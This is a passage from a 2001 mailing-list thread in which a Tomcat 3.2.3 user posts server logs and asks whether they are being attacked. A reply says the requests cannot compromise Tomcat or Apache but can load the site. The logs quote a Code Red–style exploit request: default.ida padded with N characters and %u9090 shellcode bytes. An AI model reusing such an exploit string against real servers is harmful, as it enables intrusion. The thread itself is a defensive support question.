.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 20:29:41 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 20:52:17 - ContextManager: SocketException reading request,
ignored -
java.net.SocketException: Connection reset by peer: JVM_recv in socket
input st
ream read
at java.net.SocketInputStream.socketRead(Native Method)
at java.net.SocketInputStream.read(SocketInputStream.java:86)
at java.io.BufferedInputStream.fill(BufferedInputStream.java:186)
at java.io.BufferedInputStream.read(BufferedInputStream.java:204)
at
org.apache.tomcat.service.http.HttpRequestAdapter.doRead(HttpRequestA
dapter.java:115)
at
org.apache.tomcat.core.BufferedServletInputStream.doRead(BufferedServ
letInputStream.java:106)
at
org.apache.tomcat.core.BufferedServletInputStream.read(BufferedServle
tInputStream.java:128)
at
javax.servlet.ServletInputStream.readLine(ServletInputStream.java:138
)
at
org.apache.tomcat.service.http.HttpRequestAdapter.readNextRequest(Htt
pRequestAdapter.java:129)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:198)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:11:37 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:14:54 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:16:17 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:22:47 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:25:25 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:29:39 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:43:10 - ContextManager: SocketException reading request,
ignored -
java.net.SocketException: Connection reset by peer: JVM_recv in socket
input st
ream read
at java.net.SocketInputStream.socketRead(Native Method)
at java.net.SocketInputStream.read(SocketInputStream.java:86)
at java.io.BufferedInputStream.fill(BufferedInputStream.java:186)
at java.io.BufferedInputStream.read(BufferedInputStream.java:204)
at
org.apache.tomcat.service.http.HttpRequestAdapter.doRead(HttpRequestA
dapter.java:115)
at
org.apache.tomcat.core.BufferedServletInputStream.doRead(BufferedServ
letInputStream.java:106)
at
org.apache.tomcat.core.BufferedServletInputStream.read(BufferedServle
tInputStream.java:128)
at
javax.servlet.ServletInputStream.readLine(ServletInputStream.java:138
)
at
org.apache.tomcat.service.http.HttpRequestAdapter.readNextRequest(Htt
pRequestAdapter.java:129)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:198)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:52:23 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:56:15 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:58:14 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 22:08:40 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
Re: Is someone attempting to hack my server's tomcat 3.2.3?
Posted by "Pier P. Fumagalli" <pi...@betaversion.org>.
Kenny Chow at kycaeolus@yahoo.com wrote:
> I have been getting the same thing whenever I start my
> server. Even with apache running alone, a number of
> access using GET "default.ida?NNNNNNNN" are reported
> in the log. I really wonder how this will harm to my
> apache/tomcat.
It cannot harm Tomcat, or Apache _at_all_, but it can create traffic, and
load up your site quite a bit... To the same level of a Denial Of Service
attach, anyhow, nothing is going to be compromised on _your_ server...
Pier
Re: Is someone attempting to hack my server's tomcat 3.2.3?
Posted by Kenny Chow <ky...@yahoo.com>.
I have been getting the same thing whenever I start my
server. Even with apache running alone, a number of
access using GET "default.ida?NNNNNNNN" are reported
in the log. I really wonder how this will harm to my
apache/tomcat.
--- "Kasnol (2001)" <ka...@hotmail.com> wrote:
> Hello all,
>
> I am using tomcat 3.2.3, windows 2000 professional
> at my home, upon
> occasional inspection of my tomcat log, an
> intresting, strange error is
> observed and enclosed below. I only can caputure 200
> lines from my log
> screen, but below is the best bit of the tomcat
> output. The full version is
> appended below to my message:
>
> Parse error, missing : in ccept: */*
> t
> Full GET
>
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNN
>
NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
> 801%
>
u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0
> Content-type: text/xmlHOST:www.worm.com Accept: */*
> trol: bypass-client=202.156.138.27
> Connection: closeVia: 1.0
> <STIX>HHCE3X-Forwarded-For: 202.156.138.27
>
> I can tell that someone is trying to access via GET
> method, and
> default.ida(?) or is it downloading somestuff
> somewhere in the net?
>
> I believe it can be somehow related to the recent
> worm scare at win2k.
> Is someone trying to implant a worm in my computer,
> or is this something
> tomcat, win2k, is vulnerable to ?
> I haven't seen anything wrong with my computer
> yet... but I guess I should
> start a full visurs scan
>
> Thankx!
> Any help/light is appreciated
> Regards
> Kas
>
> /***************************** Log Description
> ***************************/
> 2001-08-05 19:53:07 - ContextManager: Error reading
> request, ignored -
> java.lang
> .NumberFormatException: 3379
> at
> java.lang.Integer.parseInt(Integer.java:423)
> at
> java.lang.Integer.parseInt(Integer.java:463)
> at
>
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
>
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
>
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
>
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> Parse error, missing : in ccept: */*
> t
> Full GET
>
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNN
>
NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
> 801%
>
u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0
> Content-type: text/xmlHOST:www.worm.com Accept: */*
> trol: bypass-client=202.156.138.27Connection:
> closeVia: 1.0
> <STIX>HHCE3X-Forward
> ed-For: 202.156.138.27
>
> 2001-08-05 19:55:27 - Ctx( ): 404 R( +
> /default.ida + null) null
> 2001-08-05 20:10:54 - ContextManager: Error reading
> request, ignored -
> java.lang
> .NumberFormatException: 3379
> at
> java.lang.Integer.parseInt(Integer.java:423)
> at
> java.lang.Integer.parseInt(Integer.java:463)
> at
>
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
>
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
>
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
>
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 20:23:28 - ContextManager: Error reading
> request, ignored -
> java.lang
> .NumberFormatException: 3379
> at
> java.lang.Integer.parseInt(Integer.java:423)
> at
> java.lang.Integer.parseInt(Integer.java:463)
> at
>
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
>
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
>
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
>
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 20:29:41 - ContextManager: Error reading
> request, ignored -
> java.lang
> .NumberFormatException: 3379
> at
> java.lang.Integer.parseInt(Integer.java:423)
> at
> java.lang.Integer.parseInt(Integer.java:463)
> at
>
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
>
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
>
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
>
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 20:52:17 - ContextManager:
> SocketException reading request,
> ignored -
> java.net.SocketException: Connection reset by peer:
> JVM_recv in socket
> input st
> ream read
> at
> java.net.SocketInputStream.socketRead(Native Method)
> at
>
java.net.SocketInputStream.read(SocketInputStream.java:86)
> at
>
java.io.BufferedInputStream.fill(BufferedInputStream.java:186)
> at
>
java.io.BufferedInputStream.read(BufferedInputStream.java:204)
> at
>
org.apache.tomcat.service.http.HttpRequestAdapter.doRead(HttpRequestA
> dapter.java:115)
> at
>
org.apache.tomcat.core.BufferedServletInputStream.doRead(BufferedServ
> letInputStream.java:106)
> at
>
org.apache.tomcat.core.BufferedServletInputStream.read(BufferedServle
> tInputStream.java:128)
> at
>
javax.servlet.ServletInputStream.readLine(ServletInputStream.java:138
> )
> at
>
org.apache.tomcat.service.http.HttpRequestAdapter.readNextRequest(Htt
> pRequestAdapter.java:129)
> at
>
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:198)
> at
>
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
>
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:11:37 - ContextManager: Error reading
> request, ignored -
>
=== message truncated ===
__________________________________________________
Do You Yahoo!?
Make international calls for as low as $.04/minute with Yahoo! Messenger
http://phonecard.yahoo.com/